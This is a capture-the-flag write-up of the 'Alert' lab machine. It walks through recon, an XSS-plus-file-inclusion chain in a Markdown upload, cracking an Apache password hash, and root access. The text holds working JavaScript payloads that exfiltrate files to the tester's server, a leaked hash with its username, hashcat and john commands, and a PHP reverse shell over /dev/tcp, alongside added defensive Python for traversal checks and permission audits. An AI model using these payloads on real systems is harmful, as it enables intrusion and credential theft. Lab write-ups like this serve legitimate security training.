Alert

Writeup of Alert machine


Reconnaissance

Nmap Scanning Process

Nmap, a network discovery tool, involves several steps:

  1. Host Discovery: Identify live hosts using ICMP, TCP, or UDP packets.

  2. Port Scanning: Scan for open ports on discovered hosts.

  3. Service Detection: Determine running services and versions on open ports.

  4. OS Detection: Detect the operating system of remote hosts.

  5. Script Scanning: Use Nmap scripts for tasks like vulnerability detection.

  6. Output Options: Save results in various formats for analysis or reporting.

These steps help map the network and assess its exposure. The Nmap output shows that the machine has two open ports: 22 and 80.

Result of Nmap
  • Port 80: This port is commonly used for HTTP (Hypertext Transfer Protocol) traffic, which forms the foundation of the web. It is the default port for web servers to accept requests from web browsers over an unencrypted connection.

  • Port 22: Known as the default port for SSH (Secure Shell), it allows secure management and data transfer over unsecured networks. SSH is commonly used for remote server management and secure file transfers.

Subdomain Discovery Using Fuzzing Method

The fuzzing method involves sending a series of test inputs to identify valid subdomains for a given domain. The ffuf (Fuzz Faster U Fool) tool can be used to automate this process by:

  1. Command Structure: The basic command format includes the target domain, header options, and wordlist.

  2. URL and Header: Specify the URL you are targeting and use the -H option to set a header with a placeholder (FUZZ) for potential subdomains.

  3. Wordlist: Utilize a wordlist containing common subdomain names to systematically test each entry. The -w option specifies the path to this list.

  4. Status Code Filtering: Use -fc to filter out certain HTTP status codes (e.g., 301) to focus on potential subdomains that yield different responses.

This fuzzing uncovers hidden or unlisted subdomains (virtual hosts) by trying each wordlist entry in the Host header and keeping the responses that differ from the default one.

ffuf -c -u http://alert.htb -H "Host: FUZZ.alert.htb" -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fc 301
Finding sub-domain by Fuzzing

http://statistics.alert.htb -> prompts for a username and password

http://alert.htb -> Output below

Web

Identifying Bugs

Analysis shows that the page accepts a Markdown (.md) file as input and renders it. After some tests in Burp Suite, I suspected an XSS injection and decided to try it.

Burp Suite is a powerful web vulnerability scanner and testing framework used primarily for assessing the security of web applications.

Exploitation

Our payload will look like this 👏

Hosting a Malicious Server

python3 -m http.server 8888

Malicious Markdown File (MD File)

<script>
fetch("http://alert.htb/messages.php?file=filepath")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.xx.xx:8888/?file_content=" + encodeURIComponent(data));
  });
</script>
// 10.10.xx.xx => replace with your own local IP

When this file is uploaded and viewed, the script runs in the viewer's browser: it requests messages.php?file=... (the application's LFI vulnerability), reads the private file and sends its contents to my Python server. I received the response for the vulnerable 'filepath' parameter on my server.

To get the user's password, I used this chain to read the .htpasswd file of the statistics subdomain, the one that initially asked for a username and password.

A .htpasswd file is a flat file that stores usernames and password hashes for basic authentication on an Apache HTTP Server.

<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.21.21:8888/?file_content=" + encodeURIComponent(data));
  });
</script>
Uploading the payload
Triggering the exploit
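As an added defender-side example (not code from this writeup or from the Alert application), the following Python shows the two controls that break the chain above: a hardened replacement for a "?file=" handler like messages.php, which refuses any path that resolves outside its base directory, and a small detector that flags traversal attempts in Apache access logs. The function names, the temporary directory and the log lines are all constructed for this demo.

```python
# Added example, not code from the Alert writeup or the Alert application.
# safe_read(): hardened "?file=" handler; find_traversal_attempts(): log detector.
import os
import re
import tempfile
from typing import Optional
from urllib.parse import unquote


def safe_read(base_dir: str, requested: str) -> Optional[str]:
    """Return the file's contents only if it resolves inside base_dir.

    realpath() collapses '..' segments and symlinks, so a value such as
    '../../../../var/www/statistics.alert.htb/.htpasswd' resolves outside
    base_dir and is rejected. Returns None for anything outside the directory
    or anything that is not a regular file.
    """
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    # commonpath guards against prefix tricks like /var/www/app2 vs /var/www/app
    if os.path.commonpath([base, target]) != base:
        return None
    if not os.path.isfile(target):
        return None
    with open(target, "r", encoding="utf-8") as fh:
        return fh.read()


# What a defender looks for after decoding the request target: '..' sequences
# and direct requests for sensitive dotfiles or well-known system files.
_TRAVERSAL = re.compile(r"(\.\./|\.\.\\|/\.htpasswd|/\.htaccess|/etc/passwd)", re.IGNORECASE)


def find_traversal_attempts(log_lines):
    """Return (client_ip, decoded_target) for requests that look like traversal.

    Lines are assumed to be in Apache combined log format, where the request
    target is the 7th whitespace-separated field.
    """
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 7:
            continue
        client_ip, raw_target = parts[0], parts[6]
        decoded = unquote(unquote(raw_target))  # decode twice to catch %252e%252e
        if _TRAVERSAL.search(decoded):
            hits.append((client_ip, decoded))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.10.14.5 - - [01/Jan/2025:10:00:00 +0000] "GET /messages.php?file=hello.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.10.14.9 - - [01/Jan/2025:10:00:03 +0000] "GET /messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd HTTP/1.1" 200 48 "-" "Mozilla/5.0"',
    '10.10.14.9 - - [01/Jan/2025:10:00:04 +0000] "GET /messages.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1200 "-" "curl/8.0"',
]


def demo():
    """Build a temporary message directory and exercise safe_read with an inside and an outside path."""
    with tempfile.TemporaryDirectory() as base:
        with open(os.path.join(base, "hello.txt"), "w", encoding="utf-8") as fh:
            fh.write("hello from inside the allowed directory\n")
        inside = safe_read(base, "hello.txt")
        outside = safe_read(base, "../../../../etc/passwd")
        return inside, outside


if __name__ == "__main__":
    ok, blocked = demo()
    print("inside :", repr(ok))
    print("outside:", blocked)
    for ip, target in find_traversal_attempts(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: {target}")
```

The realpath/commonpath pair is the check that matters: string filtering of ".." alone is bypassed by encoded variants, which is also why the detector decodes the target before matching. Rendering uploaded Markdown with raw HTML disabled (or sanitising the output) removes the other half of the chain, since the file read above only became a remote exfiltration because the script could run in an authenticated user's browser.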

User Flag

Output

So the user's hashed password, as it arrived URL-encoded at the server, is:

%3Cpre%3Ealbert%3A%24apr1%24bMoRBJOg%24igG8WBtQ1xYDTQdLjSWZQ%2F%0A%3C%2Fpre%3E%0A

Paste it into CyberChef and decode it with the URL Decode recipe. Result:

albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
username -> albert
password hash -> $apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/

To crack the password, we first need to identify the hash type. Using the hashcat example-hashes cheat sheet, the $apr1$ prefix maps to mode:

1600  Apache $apr1$ MD5, md5apr1, MD5 (APR)
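As an added example (not code from this writeup), the following Python reproduces the CyberChef URL-decode step on the exfiltrated blob shown above and then audits each .htpasswd entry: it recognises the hash scheme from its prefix, reports the hashcat mode a tester would pick, and states whether the scheme is one a defender should migrate away from. The scheme table and the audit function are constructed for this example and list only schemes whose hashcat mode numbers are well known.

```python
# Added example, not code from the Alert writeup. Decodes the exfiltrated
# .htpasswd blob and classifies each entry's hash scheme.
import re
from html import unescape
from urllib.parse import unquote

# URL-encoded string exactly as it reached the listener in the writeup.
EXFILTRATED = "%3Cpre%3Ealbert%3A%24apr1%24bMoRBJOg%24igG8WBtQ1xYDTQdLjSWZQ%2F%0A%3C%2Fpre%3E%0A"

# Hash prefix -> (scheme name, hashcat mode, defender verdict).
SCHEMES = {
    "$apr1$": ("Apache APR1 MD5 (md5apr1)", 1600,
               "weak: MD5-based and fast to brute-force; migrate to bcrypt (htpasswd -B)"),
    "$1$":    ("md5crypt", 500, "weak: MD5-based; migrate to bcrypt"),
    "$2y$":   ("bcrypt", 3200, "ok"),
    "$2a$":   ("bcrypt", 3200, "ok"),
    "$5$":    ("sha256crypt", 7400, "ok"),
    "$6$":    ("sha512crypt", 1800, "ok"),
    "{SHA}":  ("SHA-1 base64 (nsldap)", 101, "weak: unsalted SHA-1; migrate to bcrypt"),
}


def decode_exfil(blob: str) -> str:
    """URL-decode the blob (what CyberChef's URL Decode recipe does) and drop the <pre> wrapper."""
    text = unquote(blob)
    text = re.sub(r"</?pre>", "", text)
    return unescape(text).strip()


def classify_hash(h: str):
    """Map a single .htpasswd hash value to (scheme, hashcat mode, verdict)."""
    for prefix, info in SCHEMES.items():
        if h.startswith(prefix):
            return info
    # 13 characters from the crypt(3) alphabet: traditional DES crypt.
    if re.fullmatch(r"[./0-9A-Za-z]{13}", h):
        return ("crypt(3) DES", 1500, "weak: 8-character limit DES; migrate to bcrypt")
    return ("unknown or plaintext", None, "unknown scheme: check whether this is a plaintext password")


def audit_htpasswd(text: str):
    """Parse user:hash lines and return (user, scheme, hashcat mode, verdict) per entry."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, h = line.split(":", 1)
        scheme, mode, verdict = classify_hash(h)
        findings.append((user, scheme, mode, verdict))
    return findings


if __name__ == "__main__":
    entry = decode_exfil(EXFILTRATED)
    print(entry)
    for user, scheme, mode, verdict in audit_htpasswd(entry):
        print(f"{user}: {scheme} (hashcat -m {mode}) -> {verdict}")
```

The verdicts are the practical takeaway: an $apr1$ entry falls to a wordlist attack in seconds because each guess costs one salted MD5 chain, whereas bcrypt entries (htpasswd -B) make the same rockyou run orders of magnitude slower.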

Hashcat is a powerful password recovery tool that supports many hashing algorithms and attack modes. It is known for its speed, versatility, and GPU acceleration, making it ideal for security testing and forensics.

hashcat -m 1600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt

Since hashcat needs a fairly large amount of memory, John the Ripper can be used instead:

john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long hash.txt
Password of user

BOOM!!!

Log in as that user over SSH and read the user.txt file.

ssh albert@10.10.11.44

Root Flag

Privilege Escalation

LinPEAS.sh is a script that enumerates possible privilege-escalation paths on Linux systems. It automates the search for vulnerabilities and misconfigurations that could be used to gain higher-level access, which makes it useful both to attackers and to administrators and security teams looking to find and fix those issues.

LinPEAS reveals an extra open port, 8080, bound to localhost, so we forward it over SSH:

ssh -L 8080:127.0.0.1:8080 albert@alert.htb

Testing the open port locally using ssh

Accessing Locally

The most interesting finding is that the /opt directory has root permissions, which gives a great opportunity to place a shell there and execute it from the browser.

  1. Create a shell.php file:

<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.**.**/4444 0>&1'"); ?>

  2. Place the file in the /opt/website-monitor/config directory.

  3. Start a netcat listener:

nc -lnvp 4444

  4. Execute the shell through the forwarded port 8080:

http://127.0.0.1:8080/config/shell.php
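The root step works because a directory that a web service executes files from is writable by an unprivileged user. As an added defender-side example (not code from this writeup or from the website-monitor application), the following Python walks an application tree and reports every file or directory that any user can write to, which is the check an administrator would run on /opt before exposing such a service. The directory layout it builds is constructed for the demo and only loosely mimics the one on the box.

```python
# Added example, not code from the Alert writeup. Finds world-writable paths
# under a web application tree, the misconfiguration the root step relied on.
import os
import stat
import tempfile


def world_writable(root: str):
    """Return sorted paths (relative to root) whose mode grants write to 'other'.

    Symlinks are skipped: their own mode is meaningless, and the target is
    checked where it actually lives.
    """
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISLNK(st.st_mode):
                continue
            if st.st_mode & stat.S_IWOTH:
                findings.append(os.path.relpath(full, root))
    return sorted(findings)


def build_demo_tree() -> str:
    """Constructed layout: an app root with one world-writable config directory.

    Modes are set explicitly so the result does not depend on the caller's umask.
    """
    base = tempfile.mkdtemp(prefix="website-monitor-demo-")
    os.makedirs(os.path.join(base, "config"))
    os.makedirs(os.path.join(base, "public"))
    with open(os.path.join(base, "index.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php echo 'ok'; ?>\n")
    with open(os.path.join(base, "config", "settings.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php $debug = false; ?>\n")
    os.chmod(os.path.join(base, "config"), 0o777)          # the dangerous one
    os.chmod(os.path.join(base, "config", "settings.php"), 0o644)
    os.chmod(os.path.join(base, "public"), 0o755)
    os.chmod(os.path.join(base, "index.php"), 0o644)
    return base


def demo():
    """Build the constructed tree and return the world-writable paths found in it."""
    base = build_demo_tree()
    return world_writable(base)


if __name__ == "__main__":
    for path in demo():
        print(f"world-writable: {path}")
```

A hit on a directory is worse than a hit on a file: anyone can create new files there, so a service that executes whatever it finds in that directory (as the PHP application on port 8080 did) will run attacker-chosen code with its own privileges. The fix is to remove the write bit for others and to run the service as an unprivileged account rather than root.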

The End!!! 🔚

Thank you!!! 🙏
